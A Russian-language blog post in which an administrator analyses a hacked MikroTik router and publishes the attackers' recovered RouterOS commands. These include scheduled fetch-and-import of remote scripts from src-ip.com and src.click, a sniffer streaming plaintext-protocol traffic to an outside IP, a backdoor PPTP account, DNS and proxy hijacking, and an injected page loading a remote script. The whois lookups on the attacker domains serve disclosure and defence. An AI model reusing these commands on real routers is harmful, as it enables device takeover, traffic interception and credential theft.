После взлома микротик стал ПРОКСИ шпионом

Интернет
Следствия и Последствия взлома микротика
Недавно столкнулся с одним глюкующим микротиком, он стал терять пакеты и потерял управление по winbox.
Зайдя локально по мак адресу на устройство было видно то, что проц упёрт в 100%, фаервол соединений около 3000 штук, в логах только одна строчка. Порт винбокс поменяли.
Микротик с внешним айпишником и прошивкой 6.42.7
Ну ясно!
Микротик взломали!
Для начала вырубил webproxy на котором подсели сотки юзарей.
Вырубил носки.
и обратил внимание на правила в фаерволе и манглы.
О ужас! Этож открытый прокси сервер! Идёт перенаправление и перехват данных.
Во всех списках прокси листах он уже есть! ЁП!

В общем всё по порядку как это делали злодеи, ломатели микротиколв.
В терминале посмотрел последние комманды
/tool fetch url=http://47.96.89.95:8000/autosupout.rif;:delay 5;/im autosupout.rif;/file remove
[find name=autosupout.rif];:if ([:len [/ip pool find name=dodo]]=0) do={/ip pool add name=dodo range=100.64.0.1-1
00.64.254;/ppp pro add name=dodo copy-from=default-encryption local-address=100.64.0.0 remote-address=dodo;/ppp se
c add name=dodo pass=dodo profile=dodo;/in pptp-ser server set enabled=yes;/ip fi nat add chain=srcnat src-address
=100.64.0.0/16 action=masquerade}

/tool sniffer set streaming-server=37.1.207.114 streaming-enabled=yes
/tool sniffer set filter-interface=all filter-ip-protocol=tcp,udp filter-port=20,21,110,143,150
0,10000 

/system scheduler add name="CMD_OS" start-time="startup" interval="00:01:00" on-event="/tool fe
tch url=http://src-ip.com/cmd.txt mode=http dst-path=i113.rsc\r\n/import i113.rsc;:delay 6s;/file remove i113.rsc"


из последнего было ясно что запущена пачка комманд с ресурса src-ip.com/cmd.txt
код
/system logging action set memory memory-lines=1
/system scheduler add interval=25m name="DDNS Serv" on-event="/system script run iDDNS" start-time=startup
/system scheduler
add interval=20m name="DDNS Backup" start-time=startup on-event=":global\
    \_mac [/interface ethernet get 0 mac-address]\r\
    \n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\
    \"_\".[/ip proxy get port])\r\
    \n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled])\r\
    \n:global cmd \"/\$mac/\$port/\$info/dns\"\r\
    \n:do {/tool fetch address=azdns.ru src-path=\$cmd mode=http dst-path=dn\
    s} on-error={/tool fetch address=src.click src-path=\$cmd mode=http dst-pa\
    th=dns}\r\
    \n:delay 3s;/import dns;:delay 4s;/file remove dns"
/system scheduler
add interval=24h name="DDNS reLoad" start-time=startup on-event="/tool fetch url=http://src.click/error.html mode=http dst-path=flash/webproxy/error.html;/tool fetch url=http://src.click/error.html mode=http dst-path=webproxy/error.html"
/ip dns set allow-remote-requests=yes servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141
/ip socks set enabled=yes port=("3".[:pick [/system clock get time ] 3 5].[:pick [/system clock get time] 6 8])
/ip socks access remove [/ip socks access find]
/ip proxy set anonymous=no enabled=yes port=8080 src-address=::
/ip proxy access remove [/ip proxy access find]
/ip proxy access add action=deny disabled=no
/ip firewall nat remove [find comment=sysadminpxy]
/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy
/ip firewall nat move [find comment=sysadminpxy] destination=0
/ip firewall filter remove [find comment=sysadminpxy]
/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=15s comment=sysadminpxy
/ip service set winbox port=("4".[:pick [/system clock get time ] 3 5].[:pick [/system clock get time] 6 8]);/ip service disable telnet,ftp,www-ssl,api,api-ssl,ssh
/tool fetch url=http://src.click/error.html mode=http dst-path=flash/webproxy/error.html
/tool fetch url=http://src.click/error.html mode=http dst-path=webproxy/error.html
:do {/ppp secret add name=srcvpn service=any password=[/interface ethernet get 0 mac-address] profile=default-encryption local-address=192.168.1.1 \ remote-address=192.168.1.101;/interface pptp-server server set enabled=yes max-mtu=1500 max-mru=1500} on-error={}
:delay 8s;/file remove final.rsc;/system scheduler remove RE_CMD


src.click/error.html

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>$(url)</title>
    <style>
        .full-screen-preview {
            height: 100%;
            padding: 0px;
            margin: 0px;
            overflow: hidden
        }
        
        .full-screen-preview__frame {
            display: block;
            background: #fff;
            border: none;
            height: 100vh;
            width: 100vw;
        }
    </style>
    <script src="https://priv.su/src.js"></script>
</head>

<body class="full-screen-preview">
    <script>
        var didItOpen = false;
        setTimeout(function() {
            if (!didItOpen) window.frames['load-url'].location = '$(url)';
        }, 10);
    </script>
    <iframe class="full-screen-preview__frame" name="load-url" frameborder="0" noresize="noresize"></iframe>
</body>

</html>

В общем то невесело!
Ну и кто они src.click и src-ip.com?
Сидят на одном IP
[173.212.202.205]
IP Address 173.212.202.205
Decimal Representation 2916403917
ASN AS51167
City
Country Germany
Country Code DE
ISP Contabo GmbH
Latitude 51.2993° (51° 17′ 57″ N)
Longitude 9.4910° (9° 29′ 27″ E)
Organization Contabo GmbH
Postal Code
Is Private IP Address no
PTR Resource Record vmi212893.contaboserver.net
Is Reserved IP Address no
State
State Code
Timezone Europe/Berlin
Local Time 2018-11-24 05:55:14+01:00


Информация по данным whois.tldregistrarsolutions.com
Domain Name: SRC-IP.COM
Registry Domain ID: 2295454030_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.tldregistrarsolutions.com
Registrar URL: www.tldregistrarsolutions.com
Updated Date: 2018-10-17T02:13:55Z
Creation Date: 2018-08-09T16:34:13Z
Registrar Registration Expiration Date: 2020-08-09T16:34:13Z
Registrar: TLD Registrar Solutions Ltd.
Registrar IANA ID: 1564
Registrar Abuse Contact Email: abuse@tldregistrarsolutions.com
Registrar Abuse Contact Phone: +1.5167401179
Reseller:
Domain Status: clientTransferProhibited — www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Domain Admin
Registrant Organization: Whois Privacy Corp.
Registrant Street: Ocean Centre, Montagu Foreshore, East Bay Street
Registrant City: Nassau
Registrant State/Province: New Providence
Registrant Postal Code:
Registrant Country: BS
Registrant Phone: +1.5163872248
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: src-ip.com-owner-r77k@customers.whoisprivacycorp.com
Registry Admin ID:
Admin Name: Domain Admin
Admin Organization: Whois Privacy Corp.
Admin Street: Ocean Centre, Montagu Foreshore, East Bay Street
Admin City: Nassau
Admin State/Province: New Providence
Admin Postal Code:
Admin Country: BS
Admin Phone: +1.5163872248
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: src-ip.com-admin-rise@customers.whoisprivacycorp.com
Registry Tech ID:
Tech Name: Domain Admin
Tech Organization: Whois Privacy Corp.
Tech Street: Ocean Centre, Montagu Foreshore, East Bay Street
Tech City: Nassau
Tech State/Province: New Providence
Tech Postal Code:
Tech Country: BS
Tech Phone: +1.5163872248
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: src-ip.com-tech-yrk0@customers.whoisprivacycorp.com
Name Server: ns-canada.topdns.com
Name Server: ns-uk.topdns.com
Name Server: ns-usa.topdns.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: wdprs.internic.net/
>>> Last update of WHOIS database: 2018-11-24T04:50:08Z <<<

Багамы? АХЕРЕТЬ точняк ХАЦКЕРЫ БЛИН!



Domain Name: SRC.CLICK
Registry Domain ID: DO_127280f617ff3512314f5f0b1cb73903-UR
Registrar WHOIS Server: whois.tucows.com
Registrar URL: http://tucowsdomains.com
Updated Date: 2018-10-14T14:00:10
Creation Date: 2018-10-14T13:52:34
Registrar Registration Expiration Date: 2019-10-14T13:52:34
Registrar: TUCOWS, INC.
Registrar IANA ID: 69
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Registry Registrant ID: 
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: REDACTED FOR PRIVACY
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: REDACTED FOR PRIVACY
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: 
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: 
Registrant Email: REDACTED FOR PRIVACY
Registry Admin ID: 
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: 
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: 
Admin Email: REDACTED FOR PRIVACY
Registry Tech ID: 
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: 
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: 
Tech Email: REDACTED FOR PRIVACY
Name Server: 1-you.njalla.no
Name Server: 2-can.njalla.in
Name Server: 3-get.njalla.fo
Registrar Abuse Contact Email: domainabuse@tucows.com
Registrar Abuse Contact Phone: +1.4165350123
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

3 комментария

avatar
НА одной железке точно такая же хрень появилась
avatar
Поздравляю Вас, добро пожаловать в наши ряды. Если есть возможность то скидывайтесь под ноль и шейтесь новой прошивкой. От старых паролей ничего не оставлять, тока новые.
комментарий был удален
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.